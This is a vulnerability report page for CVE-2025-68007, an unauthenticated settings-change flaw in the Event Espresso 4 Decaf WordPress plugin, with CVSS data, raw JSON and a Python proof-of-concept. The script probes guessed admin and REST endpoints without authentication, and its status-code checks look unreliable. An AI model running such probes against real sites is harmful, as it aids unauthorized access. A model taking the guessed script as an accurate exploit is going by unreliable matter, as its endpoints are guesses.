Security Vulnerability Report
中文
CVE-2025-68007 CVSS 6.5 MEDIUM

CVE-2025-68007

Published: 2026-01-22 17:16:07
Last Modified: 2026-04-27 19:16:22

Description

Missing Authorization vulnerability in Event Espresso Event Espresso 4 Decaf event-espresso-decaf allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Event Espresso 4 Decaf: from n/a through <= 5.0.37.decaf.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Event Espresso 4 Decaf (event-espresso-decaf) <= 5.0.37.decaf

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68007 PoC - Event Espresso 4 Decaf Missing Authorization # Target: WordPress site with Event Espresso plugin <= 5.0.37.decaf target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-site.com" # Since this is a missing authorization vulnerability, the attacker # can directly access the vulnerable endpoint without authentication # Identify vulnerable endpoint - typically settings-related endpoints vulnerable_endpoints = [ "/wp-admin/admin.php?page=espresso_settings", "/wp-json/ee/v1/settings", "/wp-admin/admin-ajax.php?action=ee_settings_update" ] print(f"[*] Testing CVE-2025-68007 on {target_url}") print(f"[*] Vulnerability: Missing Authorization in Event Espresso 4 Decaf") for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint # Try to access without authentication try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint} - Accessible without auth") print(f" Status Code: {response.status_code}") elif response.status_code == 403: print(f"[-] Protected: {endpoint} - Requires authentication") else: print(f"[*] Endpoint: {endpoint} - Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error testing {endpoint}: {e}") print("\n[*] PoC completed. If vulnerable endpoints found, they can be exploited") print("[*] to modify plugin settings without authorization.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68007", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:06.963", "lastModified": "2026-04-27T19:16:21.513", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Event Espresso Event Espresso 4 Decaf event-espresso-decaf allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Event Espresso 4 Decaf: from n/a through <= 5.0.37.decaf."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Event Espresso Event Espresso 4 Decaf event-espresso-decaf permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Event Espresso 4 Decaf: desde n/a hasta &lt;= 5.0.37.decaf."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/event-espresso-decaf/vulnerability/wordpress-event-espresso-4-decaf-plugin-5-0-37-decaf-settings-change-vulnerability?_s_id=cve", "source": "[email protected]"}]}}